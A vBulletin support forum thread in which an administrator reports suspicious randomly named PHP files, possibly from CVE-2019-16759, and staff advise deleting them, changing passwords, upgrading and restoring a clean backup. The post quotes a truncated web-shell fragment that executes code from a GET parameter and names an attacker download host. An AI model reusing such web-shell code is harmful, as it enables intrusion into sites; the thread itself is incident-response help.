Announcement

Collapse
No announcement yet.

Is there a service to check files to see if i got hacked?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Is there a service to check files to see if i got hacked?

    Is there a service to check files to see if i got hacked?

    I see that I have some new files that where modified when my forum was in offline mode...files like:
    /jkauvaecvu.php, /edfqrfhpzr.php, /wfhrrvigoq.php, /zvdmhiqpkn.php (oV4,Download=>anonymousfox.com\n";$code=$_GET["php"];if(empty($code) or!strist...) and /grqlvhscwb.php

    How can I clean my forum? I was about to do the new update but looks like I got hacked. I don't know if it was from the new vBulletin 0-Day RCE CVE-2019-16759.

    ok i found the diagnostics tool:

    Click image for larger version

Name:	image_76947.png
Views:	102
Size:	26.2 KB
ID:	4446749
    ​​​​​​​
    What is the best action to do?
    Attached Files
    Last edited by Raykai; Wed 2 Sep '20, 7:22pm.

  • #2
    The first thing you should do is remove any files that are listed as unrecognised, unless they are ones you have put there yourself.

    Then you should change your database, ftp and vBulletin administrator passwords.

    If you are not already running vBulletin 5.6.3, you should immediately carry out a full upgrade to that version.
    MARK.B | vBULLETIN SUPPORT

    TalkNewsUK - My vBulletin 5.6.4 Demo
    AdminAmmo - My Cloud Demo

    Comment


    • #3
      If you have a clean backup forums, you have to clean the entire website then restore the backup and upgrade it immediately.

      The malicious file could have caused your website to be blacklistet by search engines so you will need to check for this then resubmit your website. Scan your website through succuri.net and see.

      Comment


      • #4
        Originally posted by Mark.B View Post
        The first thing you should do is remove any files that are listed as unrecognised, unless they are ones you have put there yourself.

        Then you should change your database, ftp and vBulletin administrator passwords.

        If you are not already running vBulletin 5.6.3, you should immediately carry out a full upgrade to that version.
        where is the config file to change the MSQL password?

        Comment


        • #5
          /core/includes/config.php will contain the mysql password that vBulletin uses.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment

          widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
          Working...
          X